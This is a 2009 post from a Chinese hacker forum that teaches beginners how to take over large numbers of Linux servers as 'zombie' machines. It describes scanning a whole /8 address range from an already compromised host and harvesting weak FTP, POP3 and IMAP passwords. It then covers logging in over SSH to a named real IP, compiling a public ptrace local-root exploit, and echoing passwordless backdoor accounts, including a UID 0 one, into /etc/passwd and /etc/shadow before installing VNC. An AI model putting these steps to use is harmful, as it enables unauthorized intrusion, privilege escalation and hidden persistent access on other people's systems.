标题:
[分享]
投向Linux肉鸡的怀抱
[打印本页]
作者:
柔肠寸断
时间:
2009-5-13 19:23
标题:
投向Linux肉鸡的怀抱
很多菜鸟都在重复的玩
3389
肉鸡,时间长了自然就腻味了,非常梦想得到自己的
Linux
肉鸡。今天我就写一篇关于菜鸟如何获得大量
Linux
肉鸡的方法。
需要工具如下:
Ssport
,下载地址:
http://count.skycn.com/s0ftdownlOad.php?id=15011&url=http://hn-http.skycn.net:8180/down/ssport.rar
HSCAN
,下载地址:
http://www.cnhonker.com/download/releases/Tools/hscan.zip
Putty
,下载地址:
http://count.skycn.com/s0ftdownlOad.php?id=9371&url=http://hn-http.skycn.net:8180/down/putty.exe
另外还需要一个
VNC
的
Linux
版本,头一次得到自己的
Linux
肉鸡,当然要看看它的桌面了。工具基本齐全了,下面首先请出
Ssport
这个强大的、特别适合新手入侵者使用的扫描器。程序界面如图
1
所示。
图
1
软件的中部位置有端口设置,我们添加如下端口
22
,
23
,
512
,
513
,
514
。程序上方有
IP
段落设置,既然想得到大量
Linux
肉鸡,范围不防设置大点,
211.0.0.1_211.255.255.255
(脚本小子:记得在自己比较稳定的
3389
肉鸡上扫描,自己的机器可舍不得啊,太费电了吧?)。
经过好几天的等待,终于扫描结束了。其实
Ssport
非常方便,中途你觉得差不多的时候,可以保存部分结果进行下一步动作。让这个工具继续扫描时候,它不但从原先的结束点开始,还会问你是把扫描的结果剪除后继续扫描,还是不删除原先的结果扫描,很体贴的。将结果导出为一个文本文件,我们需要简单处理。如图
2
所示。
图
2
选择替换把
22
、
23
、
512
、
513
、
514
全部处理掉,就会得到一个干净的
IP
地址列表。下面就需要我们的第二个工具
HSCAN
出场了。程序的界面如图
3
所示。
图
3
我们依次选
Menu
菜单
->Pamareter
子菜单
->Hostlist
,把我们刚才整理的
IP
地址文本导入,还要记得把
Ping host before scan
选项给去掉,这样可以多得到些信息,不过花费的时间更长。
扫描范围选择好了,再来选择扫描模块,
Modules
在这里我们选择
Check ftp weak accounts
、
Check pop3 weak accounts
和
Check imap weak accounts
三个模块,开始扫描吧!最终
HSCAN
会给我们一份扫描报告。如图
4
所示。
图
4
看清楚了么?我们仔细的看这份报告。对于发现了弱口令,且关于
FTP
、
POP
、
IMAP
版本有
WU-FTP
、
VSFTP
、
PROFTP
和
Linux
、
Unix
字样的肯定就是
Linux
系统。看到了报告吗?
61.197.254.149
这个
IP
就有弱口令,它的
FTP
版本是
WU-2.6.2.5
,肯定是一个
Linux
系统。
现在我们要想办法登陆上它的系统,这时候用我们的第三个工具
Putty
。如果你还保存有
IP
地址的原始数据,就是刚刚用
SSPORT
扫描后还带有端口信息的那个文本,我们就可以查到
61.197.254.149
这个
IP
开放的端口信息,它的
22
端口是开放的。这正好方便我们,打开
PUTTY
,填写
IP61.197.254.149
,选择
SSH
协议,点击打开。过一会儿会弹出如图
5
所示的界面。
图
5
我们只要点
YES
就会出现登陆提示,按照扫描出来的弱口令点登陆就连接到对方主机上了。如图
6
所示。
图
6
输入命令
Uname –a
查看内核版本,一般版本都不高,给大家推荐一个好的本地溢出代码,连接地址如下:
http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c
。我们先在命令提示下输入
Cat >1.c
,然后选择复制这段代码,粘贴到肉鸡上。如图
8
所示。
图
8
然后用
Ctrl+z
键这段代码就被保存在肉鸡上了。下面我们编译它,输入命令“
gcc -o 1 1.c
”,如图
9
所示。
图
9
然后执行这个命令,哈哈,看到了么?所有的
ID
为
0
,提示符变成了
#
号,我们已经是管理员了!如图
10
所示。
图
10
加个自己的用户吧:
mkdir /home/.network
echo network::500:500::/home/.network:/bin/bash>>/etc/passwd
echo network::::::::>>/etc/shadow
passwd network
加个管理员以后方便自己:
echo xctc::::::::>>/etc/shadow
echo xctc::0:0::/home/.network:/bin/bash>>/etc/passwd
passwd xctc
如图
11
所示。
图
11
好了,入侵告一段落。
相信很多菜鸟都很渴望看到
Linux
的桌面。那么我们就给他安装
VNC
吧,因为它是跨平台的,而且客户端访问可以在浏览器里面进行。安装方法很简单:
tar zxvf vnc-3.3.3r1_x86_linux_2.0.tgz
cd vnc_x86_linux_2.0
cp *vnc* /usr/local/bin/
mkdir /usr/local/vnc
cp -r classes/ /usr/local/vnc/
设置Vnc Server的访问密码:
vncpasswd
启动Vnc Server:
vncserver
最新版本的
VNC
安装方式就更简单了,大家可以到这里去下载:
http://www.realvnc.com
安装好后有时候不能看到漂亮的
Linux
桌面,需要我们执行下面命令的任何一个,
Startkde
或者
Gnome-session
,这两命令一个是启动到
KDE
桌面,一个是启动到
GNOME
桌面。先给大家一个截图诱惑大家一下吧!这可是在
Windows
下控制
Linux
哦!如图
12
所示。
图
12
另外大家可以到以下站点找
Linux
的本地和远程溢出代码:
www.netric.org
http://www.packetstormsecurity.org/
www.cnhonker.com
作者:
冷酷鲨鱼
时间:
2010-4-17 19:32
0也没人顶。我来也。
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2